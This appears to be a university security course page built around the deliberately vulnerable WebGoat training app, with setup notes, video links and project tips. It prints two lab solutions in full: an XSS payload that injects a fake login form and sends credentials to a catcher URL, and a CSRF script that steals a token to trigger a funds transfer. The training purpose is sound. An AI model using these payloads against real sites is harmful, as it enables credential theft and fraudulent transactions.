CSM202 Security in System Development

Assessment: 100% Project (with NO TII requirement)

WebGoat & WebWolf:

Version 8 is now released

Version 6.0.1 link: http://webgoat.github.io

Version 5.4 Download link: https://code.google.com/p/webgoat/downloads/list

We will need a Tomcat server, with a MySQL database for this unit.

System Pre-requirement: JDK

The known problems:

• Non-English Window OS conflict.

• Running 2 instance of Tomcat at the same time.

• Do not place WebGoat on the Desktop

• Do not place WebGoat in the root C: drive

WebGoat 8 and WebWolf Playlist

https://www.youtube.com/playlist?list=PLrHVSJmDPvlqxCfBhPuksHdpViPyeZTsF

Chapter 1

We will be using these number of phases for our SDLC model.

Chapter 4

Chapter 9

Introduction to SQL

Cross-Site Scripting (XSS) - Phishing with XSS

</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR> 

Cross-Site Scripting (XSS) - Cross-Site Request Forgery (CSRF) - Token By-Pass

<script language="javascript">

<!--

var tokensuffix;

function readFrame1()

{

    var frameDoc = document.getElementById("frame1").contentDocument;

    var form = frameDoc.getElementsByTagName("form")[0];

    tokensuffix = '&CSRFToken=' + form.CSRFToken.value;

    loadFrame2();

}

function loadFrame2()

{

    var testFrame = document.getElementById("frame2");

    testFrame.src="http://localhost:8080/WebGoat/attack?Screen=275&menu=900&transferFunds=5000" + tokensuffix;

}

</script>

<iframe src="http://localhost:8080/WebGoat/attack?Screen=275&menu=900&transferFunds=main" onload="readFrame1();"id="frame1" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>

<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>

Webgoat 6 Playlist

https://www.youtube.com/playlist?list=PLrHVSJmDPvlrpEy7CXrD8GzNsHVk8FxAy

Project

Using Draw.IO for diagramming is a lot easier than drawing shapes and line in Word.

There is NO need to printout your documentation. Submission in softcopy.

Useful link: www.owasp.org

FAQ

Q: I have copied Java into my PC but I still can't get it to work properly.

A: Do a proper installation of your Java. If you just copy Java, the path and environment may not be set properly.

Special Thanks To

• North Carolina State University

• American Military University